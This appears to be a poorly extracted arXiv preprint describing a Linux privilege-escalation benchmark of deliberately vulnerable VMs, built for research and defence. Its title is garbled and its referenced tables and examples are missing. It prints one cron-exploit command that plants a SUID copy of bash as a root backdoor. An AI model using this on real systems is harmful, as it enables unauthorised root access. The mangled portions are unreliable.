G R ? A L P - E B: OT OOT Inux RIV SC Enchmark
G R ? A L P - E B: OT OOT Inux RIV SC Enchmark
A BSTRACT
arXiv:2405.02106v2 [cs.CR] 6 May 2024
1 I NTRODUCTION
Linux systems are integral to the infrastructure of modern computing environments, necessitating
robust security measures to prevent unauthorized access. Privilege escalation attacks represent a
significant threat, typically allowing attacker to elevate their privileges from an initial low-privilege
account to the all-powerful root account.
Privilege-Escalation attacks are typically performed manually by searching for exploitable config-
urations or vulnerable tools. The initial act of system reconnaissance, often named enumeration,
is often automated through usage of tools such as linpeas.sh1 . Exploitation itself is typically done
manually through the, hopefully ethical, hacker.
A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of
privilege-escalation techniques performed by both humans and automated tooling. Analyzing their
behavior allows defenders to better fortify their entrusted Linux systems and thus protect their in-
frastructure from potentially devastating attacks.
The benchmark’s use-case, i.e., testing the efficacy of malicious privilege escalation attacks against
Linux systems, leads to unique requirements:
• It should consist of Linux systems with provided low-privilege access, containing vulnera-
bilities that allow for root-level access.
• Given the sensitive use-case, i.e., attacking a system, the test-cases mandate strong security
boundaries, i.e., should be placed within virtual machines (VMs) to protect the security
of the host system. Using VMs additionally allows to include kernel-level vulnerabilities,
e.g., DirtyC0W 2 , without compromising the security of the host system.
• The test machines should be deployed within a local network. The machines itself should
be able to be run “air-gapped”, i.e., without internet connection. Running malicious tools
over public networks, e.g., against cloud instances even when owned by the user them-
selves, is prohibited in some jurisdictions.
1
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
2
https://github.com/firefart/dirtycow
1
Preprint
To the best of our knowledge, there exists no benchmark for evaluating Linux priv-esc capabilities
fulfilling the stated requirements.
During pen-tester education, Capture-the-Flag Tournaments (CTFs) are often used. These are simu-
lated test-cases, often placed within Virtual Machines, in which penetration-testers typically initially
try to break in, and subsequently elevate their privileges to the root level. While these CTF machines
would fulfill many of the stated requirements, they typically contain more than a single vulnerability.
Thus, using these machines makes it difficult to assess the efficacy of automated tooling precisely
for evaluation scenarios.
Training companies such as HackTheBox or TryHackMe provide cloud-based access to a steady
stream of CTF machines. Those machines have two drawbacks: (1) the test machines are offered
through the cloud and are thus not controllable by the evaluator nor fulfilling our security require-
ments, and (2) CTF challenge machines change or degrade over time. Nobody can guarantee that a
challenge machine stays the same over time, hindering the reproducibility of results.
While being unsuited to be used directly, the CTF ecosystem provides invaluable information about
potential attack classes through training material provided by the respective companies as well as
through third-party “walkthroughs” detailing attacks against out-dated CTF machines.
To solve this, we designed a novel Linux priv-esc benchmark that can be executed locally, i.e., repro-
ducible and air-gapped. To gain detailed insights into privilege-escalation capabilities we introduce
distinct test-cases that allow reasoning about the feasibility of attackers’ capabilities for each distinct
vulnerability class.
This section describes the selection process for our implemented vulnerabilities.
The benchmark consists of test cases, each of which allows the exploitation of a single specific
vulnerability class. We based the vulnerability classes upon vulnerabilities typically abused during
CTFs as well as on vulnerabilities covered by online priv-esc training platforms. Overall, we focused
on configuration vulnerabilities, not exploits for specific software versions. Recent research Happe
and Cito (2023) indicates that configuration vulnerabilities are often searched for manually while
version-based exploits are often automatically detected. This indicates that improving the former
would yield a larger real-world impact on pen-tester’s productivity.
By analyzing TryHackMe’s PrivEsc training module Tib3rius, we identified the following vulnera-
bility classes.
2
Preprint
SUID and sudo-based vulnerabilities are based upon misconfiguration: the attacker is allowed to
execute binaries through sudo or access binaries with set SUID bit and through them elevate their
privileges. Pen-Testers commonly search a collection of vulnerable binaries named GTFObins (GT-
FOBins, 2024) to exploit these vulnerabilities. We do not implement advanced vulnerabilities that
would need abusing the Unix ENV, shared libraries, or bash features such as custom functions.
Cron-based vulnerabilities were implemented both with attackers being able to view root’s cron
spool directory (to analyze exploitable crontabs) as well as with inaccessible crontabs where the
attacker would have to derive that a script (named backup.cron.sh) in their home directory is utilized
by cron.
Information Disclosure-based vulnerabilities allow attackers to extract the root password from
files such as stored text-files, SSH-Keys or the shell’s history file.
After analyzing HackTheBox’s Linux Privilege Escalation documentation (Hack The Box Ltd,
2024), we opted to add a docker-based test-case which would include both Privileged Groups
as well as Docker vulnerabilities.
We did not implement all of TryHackMe’s vulnerabilities. We opted to not implement Weak File
System permissions as world-writable /etc/passwd or /etc/shadow files are not commonly encoun-
tered during this millennium anymore and similar vulnerability classes are already covered through
the information-disclosure test cases. NFS root squashing attacks require the attacker to have root
access to a dedicated attacker box which was deemed out-of-scope for the initial benchmark. Ker-
nel Exploits are already well covered by existing tooling, e.g., linux-exploit-suggester2 Donas. In
addition, kernel-level exploits are often unstable and introduce system instabilities and thus not
well-suited for a benchmark. We opted not to implement Service Exploits as this vulnerability was
product-specific (mysql db).
The resulting vulnerability test-cases are detailed in Table 1. We discussed this selection with two
professional penetration-testers who thought it to be representative of typical CTF challenges. The
overall architecture of our benchmark allows the easy addition of further test-cases in the future.
MITRE ATT&CK is “is a knowledge base of cyber adversary behavior and taxonomy for adver-
sarial actions across their lifecycle”3, originally focusing Microsoft Windows Enterprise networks.
Subsequent iterations also include Linux attack vectors.
3
https://attack.mitre.org/resources/faq/#other-models-faq
3
Preprint
Our benchmark consists of common attack paths, according to CTF documentation. In contrast,
MITRE ATT&CK is an unordered taxonomy of potential attack vectors. In Table 2, benchmark
cases are mapped upon their corresponding MITRE techniques.
Recent research indicates that human hackers rely on intuition or checklists when searching for vul-
nerabilities Happe and Cito (2023). The mentioned checklists often consist of different vulnerability
classes to test.
To allow emulation of this manual process, we introduce optional hints to each test case in our
benchmark that emulate going through a vulnerability class checklist, e.g., the hint for sudo binaries
is “there might be a sudo misconfiguration”. The hints are about the vulnerability class, not about a
concrete vulnerability. Iterating through multiple hints would thus emulate a human going through
a checklist of vulnerability classes. Currently implemented hints are provided in Table 3.
To allow for extensibility the benchmark was implemented using well-known Unix administration
tools. The virtual machines are provisioned using the Vagrant and are based on standard Debian
GNU/Linux distributions. Vulnerabilities are introduced into each VM using Ansible automation
scripts. Ansible is also used to prepare a low-privilege account (“lowpriv”) and high-level account
(“root”) with a standard password.
After describing the selection process and composition of the benchmark, we elaborate further upon
the benchmark itself and incorporate feedback from professional penetration testers.
During the enumeration phase of an attack, system information is gathered and used to identify
potential vulnerable configurations and components that are subsequently targeted through attacks.
Penetration testers commonly stress the importance of system enumeration for successful penetra-
tion testing.
Anecdotally speaking, the time effort to enumerate a system and subsequently identify a potential
attack vector far supersedes the time effort for exploitation.
Automation in Linux privilege-escalation scenarios is focused on making system enumeration more
efficient. Tools such as linpeas.sh automate the often tedious tasks of gathering system information.
Analysis of the gathered information as well as its exploitation is typically performed manually.
4
Preprint
This is a difference to the Windows-Ecosystem where attack tooling oftentimes combines enumer-
ation and exploitation, e.g., tools such as PowerUp.ps1 or SharpUp allow to both detect as well as
exploit misconfiguration.
When analysing the potential exploitation of the vulnerabilities contained within the benchmark,
two distinct classes arise.
The first class consists of Single-Step Exploits, i.e., vulnerabilities that can be exploited by giving
a single command after successful identification in the enumeration phase. Example vulnerabilities
and their respective exploitation are shown in Table 4.
In contrast, Multi-Step Exploits warrant the execution of multiple steps. Each step depends on the
successful execution of all prior steps. One example of such a vulnerability would be the vuln docker
test-case in which the low-priv user is allowed to execute high-privileged Docker containers. In such
a scenario, the attacker would initially start a new container that mounts the host filesystem with
write access and subsequently modify the host filesystem to give the use elevated access rights. We
show an example of such an exploit in the following.
Please note, that the same scenario could be executed using a single-step exploitation when abusing
missing namespace separations:
5
Preprint
The benchmark suite also includes multiple scenarios utilizing timed tasks, i.e., cron tasks, in Linux
systems. While the prior multi-step exploitation examples had a causal ordering, cron-based exploits
also include a temporal component: in an initial step, the attacker places malicious code that will
subsequently be called by the cron process with elevated privileges. When this malicious code is
executed, it changes the system configuration and creates a backdoor that allows the attacker to
elevate their privileges. The attacker typically has to periodically check if the malicious code has
already been executed and try to elevate their privileges. Oftentimes, the attacker does not know
when or if the malicious code is executed, but has to use educated guesses about potential execution
times, e.g., that a backup script will typically be called outside of typical office hours.
The scenario cron calling user file or cron calling user file cron visible could be abused by the
following commands:
# place code that adds a new suid binary to the system
# when called through cron
echo ’#!/bin/bash\ncp /usr/bin/bash \\
/home/bash\nchmod +s /home/bash"’ \\
> /home/lowpriv/backup.cron.sh
4 C ONCLUSION
We curated a new Linux privilege escalation benchmark and elaborated on the decisions that led to
its creation. We further detail particularities about the enumeration and exploitation of Linux-based
systems that are mirrored within our benchmark.
As the benchmark is released as open-source on GitHub, and through the usage of standard Linux
system administration tools, we enable third-parties to easily extend the benchmark with additional
attack classes or more scenarios for our initially identified attack classes.
DATA AVAILABILITY
The benchmark suite has been published at github.com/ipa-lab/benchmark-privesc
-linux.
R EFERENCES
Jonathan Donas. Linux exploit suggester 2. https://github.com/jondonas/linux-e
xploit-suggester-2. Accessed: 2024-03-11.
GTFOBins. Gtfobins. https://gtfobins.github.io/, 2024. Accessed: 2024-03-11.
Hack The Box Ltd. Hackthebox academy: Linux privilege escalation. https://academy.
hackthebox.com/course/preview/linux-privilege-escalation, 2024.
Accessed: 2024-03-11.
Andreas Happe and Jürgen Cito. Understanding hackers’ work: An empirical study of offensive
security practitioners. In Proceedings of the 31st ACM Joint European Software Engineering
Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2023, New
York, NY, USA, 2023. Association for Computing Machinery.
Tib3rius. Tryhackme: Linux privesc. https://tryhackme.com/room/linuxprivesc.
Accessed: 2024-03-11.